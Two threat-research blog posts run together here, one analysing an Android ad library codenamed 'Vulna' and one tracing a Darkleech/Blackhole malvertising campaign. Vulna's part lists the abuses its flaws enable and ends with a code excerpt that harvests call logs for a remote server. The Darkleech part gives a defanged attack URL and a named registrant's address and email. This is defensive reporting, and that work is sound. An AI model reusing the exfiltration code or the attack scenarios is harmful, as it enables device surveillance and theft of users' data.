    • Vulna transfers user’s private information over HTTP in plain text, which is vulnerable to eavesdropping attacks.

    • Vulna also uses unsecured HTTP for receiving commands and dynamically loaded code from its control server. An attacker can convert Vulna to a botnet by hijacking its HTTP traffic and serving malicious commands and code.

    • Vulna uses Android’s WebView with JavaScript-­to-­Java bindings in an insecure way. An attacker can exploit this vulnerability and serve malicious JavaScript code to perform harmful operations on the device. This vulnerability is an instance of a common JavaScript binding vulnerability which has been estimated to affect over 90% of Android devices.

      Vulna’s aggressive behaviors and vulnerabilities expose Android users, especially enterprise users, to serious security threats. By exploiting Vulna’s vulnaggressive behaviors, an attacker could download and execute arbitrary code on user’s device within Vulna's host app. From our study, many host apps containing Vulna have powerful permissions that allow controlling the camera; reading and/or writing SMS messages, phone call history, contacts, browser history and bookmarks; and creating icons on home screen. An attacker could utilize these broad permissions to perform malicious actions. For example, attackers could:

      • steal two-factor authentication token sent via SMS
      • view photos and other files on the SD card
      • install icons used for phishing attacks on the home screen
      • delete files and destroy data on demand
      • impersonate the owner and send forged text messages to business partners
      • delete incoming text messages without the user’s notice
      • place phone calls
      • use the camera to take photos without user’s notice
      • read bookmarks or change them to point to phishing sites

      There are many possible ways an attacker could exploit Vulna’s vulnerabilities. One example is public WiFi hijacking: when the victim’s device connects to a public WiFi hotspot (such as at a coffee shop or an airport), an attacker nearby could eavesdrop on Vulna’s traffic and inject malicious commands and code.

      Attackers can also conduct DNS hijacking to attack users around the world, as in the Syrian Electronic Army’s recent attacks targeting Twitter, the New York Times, and Huffington Post. In a DNS hijacking attack, an attacker could modify the DNS records of Vulna’s ad servers to redirect visitors to their own control server, in order to gather information from or send malicious commands to Vulna on the victim’s device.

      Despite the severe threats it poses, Vulna is stealthy and hard to detect:

      • Vulna receives commands from its ad server using data encoded in HTTP header fields instead of the HTTP response body.

      • Vulna obfuscates its code, which makes traditional analysis difficult.

      • Vulna's behaviors can be difficult to trigger using traditional analysis. For example, in one popular game, Vulna is executed only at certain points in the game, such as when a specific level is reached, as shown in the figure below. (The figure has been partially blurred to hide the identity of the app.) When Vulna is executed, the only effect visible to the user is the ad on top of the screen. However, Vulna quietly executes its risky behaviors in the background.

        Vulna's screen shot

      FireEye Mobile Threat Prevention applies a unique approach and technology that made it possible to discover the security issues outlined in this post quickly and accurately despite these challenges. We have provided information about the discovered security issues,  the list of impacted apps and suggestions to both Google and the vendor of Vulna. They have confirmed the issues and they are actively addressing it.

      In conclusion, we have discovered a new mobile threat from a popular ad library (codenamed "Vulna" for anonymity). This library is included in popular apps on Google Play which have more than 200 million downloads in total. Vulna is an instance of a rapidly­-growing class of mobile threat, which we have termed vulnaggressive ad libraries. Vulnaggressive ad libraries are disturbingly aggressive at collecting users’ sensitive data and embedding capabilities to execute dangerous operations on demand, and they also contain different classes of vulnerabilities which allow attackers to utilize their aggressive behaviors to harm users. App developers using these third-party libraries are often not aware of the security issues in them. These threats are particularly serious for enterprise customers. Furthermore, this vulnaggressive characteristic is not just limited to ad libraries; it also applies to other third-party components and apps.

      Acknowledgement

      Special thanks to FireEye team members Adrian Mettler, Peter Gilbert, Prashanth Mohan, and Andrew Osheroff for their valuable help on writing this blog. We also thank Zheng Bu and Raymond Wei for their valuable comments and feedback.

      Appendix: Sample code snippet of collecting and sending call logs in Vulna

       

      class x implements Runnable

       

      {

      run(){

      List localList = get_call_log();

      construct_JSON_and_send_to_remote(localList);

      }

      }

      List get_call_log()

      {

      ArrayList localArrayList = new ArrayList();

      Cursor cur1 = getContentResolver().query(CallLog.Calls.CONTENT_URI,

      new String[] { "number", "type", "date" }, null, null,

      "date DESC limit 10");

      cur2 = cur1;

      if (cur2 != null){

      int i = cur2.getColumnIndex("number");

      int j = cur2.getColumnIndex("type");

      while (cur2.moveToNext()){

      String str = cur2.getString(i);

      if ((cur2.getInt(j)==2) && (!localArrayList.contains(str)))

      localArrayList.add(str);

      }

      }

      return localArrayList;

      }

Another Darkleech Campaign

Last week got us up close and personal with Darkleech and Blackhole with our external careers web site.

The fun didn’t end there, this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL:

hXXp://delivery[.]globalcdnnode[.]com/7f01baa99716452bda5bba0572c58be9/afr-zone.php

Again Darkleech was up to its tricks, injecting URLs and sending victims to a landing page belonging to the Blackhole Exploit Kit, one of the most popular and effective exploit kits available today. Blackhole wreaks havoc on computers by exploiting vulnerabilities in client applications like IE, Java and Adobe, computers that are vulnerable to exploits launched by Blackhole are likely to become infected with one of several flavors of malware including ransomware, Zeus/Zbot variants and clickfraud trojans like ZeroAccess.

We started logging hits at 21:31:00 UTC on Sunday 09/22/2013, the campaign has been ongoing, peaking Monday and tapered down through out the week.

During most of the campaign’s run, delivery[.]globalcdnnode[.]com appeared to have gone dark, no longer serving the exploit kit’s landing page as expected and then stopped resolving altogether, yet tons of requests kept flowing.

This left some scratching their heads as to whether the noise was a real threat.

Indeed, it was a real threat, as Blackhole showed up to the party a couple of days later; this was confirmed by actually witnessing a system get attacked on a subsequent visit to the URL.

 

globalcdn_BHEK

Figure 1. – Session demonstrating exploit via IE browser and Java.

 

The server returned the (obfuscated) Blackhole Landing page; no 404 this time.

Darkleech_LANDING

Figure 2 – request and response to to delivery[.]globalcdnnode[.]com.

 

The next stage was to load a new URL for the malicious jar file. At this point, the unpatched Windows XP system running vulnerable Java quickly succumbed to CVE-2013-0422.

Darkleech_JAVA

Figure 3 – Packet capture showing JAR file being downloaded.

Darkleech_Java_Classes

Figure 4. – Some of the Java class files visible in the downloaded Jar.

 

Even though our system was exploited and the browser was left in a hung state, it did not receive the payload. Given the sporadic availability during the week of both the host and exploit kit’s landing page, it’s possible the system is or was undergoing further setup and this is the prelude to yet another large-scale campaign.

We can’t say for sure but we know this is not the last time we will see it or the crimeware actor behind it.

Registrant:

Name: Alexey Prokopenko
Organization: home
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Email: alex1978a @bigmir.net

By the way, this actor has a long history of malicious activity online too.

The campaign also appears to be abusing Amazon Web Services.

globalcdnnode.com
Server:           ns-293.awsdns-36.com
Address:    205.251.193.37#53

globalcdnnode.com
origin = ns-293.awsdns-36.com
mail addr = awsdns-hostmaster.amazon.com

At time of this writing, the domain delivery[.]globalcdnnode[.]com was still resolving, using fast-flux DNS techniques to resolve to a different IP address every couple minutes, thwarting attempts at shutting down the domain by constantly being on the move.

GlobalCDN_PLESK

Figure 5. – The familiar Plesk control panel, residing on the server.

This was a widespread campaign, indirectly affecting many web sites via malvertising techniques. The referring hosts run the gamut from local radio stations to high profile news, sports, and shopping sites. Given the large amounts of web traffic these types of sites see, its not surprising there was a tidal wave of requests to delivery[.]globalcdnnode[.]com. Every time a page with the malvertisement was loaded, a request was made to hXXp://delivery.globalcdnnode.com/7f01baa99716452bda5bba0572c58be9/afr-zone.php, in the background.

To give an example of what this activity looked like from DTI, you can see the numbers in the chart below.

 

Darkleech_splunk

Figure 6. – DTI graph showing number of Darkleech detections logged each day.

By using malvertising and or posing as a legitimate advertiser or content delivery network, the bad guys infiltrate the web advertisement ecosystem. This results in their malicious content getting loaded in your browser, often times in the background, while you browse sites that have nothing to do with the attack (as was the case in our careers site).

Imagine a scenario where a good portion of enterprise users have a home page set to a popular news website. More than likely, the main web page has advertisements, and some of those ads could be served from 3rd party advertiser networks and or CDNs. If just one of those advertisements on the page is malicious, visitors to that page are at risk of redirection and or infection, even though the news website’s server is itself clean.

So, when everybody shows up to work on Monday and opens their browsers, there could be a wave of clients making requests to exploit kit landing pages, if Darkleech is lurking in those advertisement waters, you could end up with a leech or 2 attached to your network.